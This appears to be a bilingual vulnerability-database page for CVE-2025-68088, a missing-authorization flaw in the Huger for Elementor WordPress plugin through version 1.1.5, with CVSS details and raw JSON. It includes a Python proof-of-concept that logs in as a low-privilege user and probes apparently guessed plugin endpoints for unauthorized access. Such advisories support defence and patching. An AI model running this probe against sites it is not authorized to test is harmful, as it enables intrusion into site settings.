Security Vulnerability Report
中文
CVE-2025-68088 CVSS 5.4 MEDIUM

CVE-2025-68088

Published: 2025-12-16 09:16:04
Last Modified: 2026-04-15 00:35:42

Description

Missing Authorization vulnerability in merkulove Huger for Elementor huger-elementor allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Huger for Elementor: from n/a through <= 1.1.5.

CVSS Details

CVSS Score
5.4
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Huger for Elementor <= 1.1.5
Huger for Elementor 所有版本 (从初始版本到1.1.5)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-68088 PoC - Huger Elementor Missing Authorization # This PoC demonstrates accessing protected plugin functionality without proper authorization import requests import sys from urllib.parse import urljoin def test_unauthorized_access(target_url, username, password): """ Test for missing authorization vulnerability in Huger for Elementor plugin """ session = requests.Session() # Step 1: Login with low-privilege account (subscriber role) login_url = urljoin(target_url, '/wp-login.php') login_data = { 'log': username, 'pwd': password, 'wp-submit': 'Log In', 'redirect_to': target_url } response = session.post(login_url, data=login_data, allow_redirects=True) if 'wordpress_logged_in' not in str(session.cookies): print("[-] Login failed") return False print("[+] Logged in successfully with low-privilege account") # Step 2: Try to access Huger Elementor protected functionality # Common Elementor AJAX endpoints huger_endpoints = [ '/wp-admin/admin-ajax.php?action=huger_get_data', '/wp-json/huger/v1/settings', '/wp-admin/admin-ajax.php?action=huger_save_settings', ] for endpoint in huger_endpoints: full_url = urljoin(target_url, endpoint) response = session.get(full_url) # Check if access is granted without proper authorization if response.status_code == 200: print(f"[!] VULNERABLE: Unauthorized access to {endpoint}") print(f"Response: {response.text[:500]}") return True elif response.status_code == 403: print(f"[-] Protected: {endpoint} (403 Forbidden)") else: print(f"[*] Endpoint {endpoint} returned: {response.status_code}") return False if __name__ == '__main__': if len(sys.argv) < 4: print("Usage: python poc.py <target_url> <username> <password>") sys.exit(1) target = sys.argv[1] user = sys.argv[2] pwd = sys.argv[3] test_unauthorized_access(target, user, pwd)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-68088", "sourceIdentifier": "[email protected]", "published": "2025-12-16T09:16:04.040", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in merkulove Huger for Elementor huger-elementor allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Huger for Elementor: from n/a through <= 1.1.5."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/huger-elementor/vulnerability/wordpress-huger-for-elementor-plugin-1-1-5-broken-access-control-vulnerability?_s_id=cve", "source": "[email protected]"}]}}